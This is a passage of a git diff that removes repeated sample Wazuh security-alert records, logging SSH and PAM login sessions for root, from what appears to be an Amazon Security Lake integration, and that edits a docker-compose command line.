Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} diff --git a/integrations/docker/amazon-security-lake.yml b/integrations/docker/amazon-security-lake.yml index 72b647d37a72a..bb92e7c04d07c 100644 --- a/integrations/docker/amazon-security-lake.yml +++ b/integrations/docker/amazon-security-lake.yml @@ -10,7 +10,7 @@ services: depends_on: wazuh.indexer: condition: service_healthy - command: bash -c "python run.py -a wazuh.indexer -t1" + command: bash -c "python run.py -a wazuh.indexer" wazuh.indexer: image: opensearchproject/opensearch:2.11.1